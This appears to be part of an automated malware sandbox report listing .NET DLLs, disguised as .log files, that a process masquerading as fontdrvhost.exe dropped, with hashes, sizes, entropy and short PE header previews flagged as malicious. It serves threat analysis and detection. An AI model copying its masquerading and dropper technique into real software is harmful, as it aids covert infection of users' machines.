                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                  C:\Users\user\Desktop\kUpuTdpn.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):40448
                                                                  Entropy (8bit):5.7028690200758465
                                                                  Encrypted:false
                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\kdNuDPIk.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33280
                                                                  Entropy (8bit):5.634433516692816
                                                                  Encrypted:false
                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\lCADkPID.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):41472
                                                                  Entropy (8bit):5.6808219961645605
                                                                  Encrypted:false
                                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\lHCvjEeO.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):85504
                                                                  Entropy (8bit):5.8769270258874755
                                                                  Encrypted:false
                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                  C:\Users\user\Desktop\lThKWNPp.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):5.541771649974822
                                                                  Encrypted:false
                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\ldamqVhj.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):64000
                                                                  Entropy (8bit):5.857602289000348
                                                                  Encrypted:false
                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\mCNvXUiC.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38400
                                                                  Entropy (8bit):5.699005826018714
                                                                  Encrypted:false
                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\mJblSiJK.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):294912
                                                                  Entropy (8bit):6.010605469502259
                                                                  Encrypted:false
                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                  C:\Users\user\Desktop\maCuLVwe.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33280
                                                                  Entropy (8bit):5.634433516692816
                                                                  Encrypted:false
                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\mbeUnBPt.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38400
                                                                  Entropy (8bit):5.699005826018714
                                                                  Encrypted:false
                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\msUTDNPI.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):36352
                                                                  Entropy (8bit):5.668291349855899
                                                                  Encrypted:false
                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\nHlSHaLn.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34304
                                                                  Entropy (8bit):5.618776214605176
                                                                  Encrypted:false
                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\nJodFojJ.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):36352
                                                                  Entropy (8bit):5.668291349855899
                                                                  Encrypted:false
                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\nJvbxzCb.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38400
                                                                  Entropy (8bit):5.699005826018714
                                                                  Encrypted:false
                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\ntFcgnCN.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34816
                                                                  Entropy (8bit):5.636032516496583
                                                                  Encrypted:false
                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\oQWKeSDj.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.629584586954759
                                                                  Encrypted:false
                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\oTDkKMId.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.660491370279985
                                                                  Encrypted:false
                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\ouGCZwUD.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33280
                                                                  Entropy (8bit):5.634433516692816
                                                                  Encrypted:false
                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\pJXAdKPi.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):342528
                                                                  Entropy (8bit):6.170134230759619
                                                                  Encrypted:false
                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\pMKkuPam.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32256
                                                                  Entropy (8bit):5.631194486392901
                                                                  Encrypted:false
                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\phJkSByL.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38400
                                                                  Entropy (8bit):5.699005826018714
                                                                  Encrypted:false
                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\piqUgtXk.log

                                                                  Download File
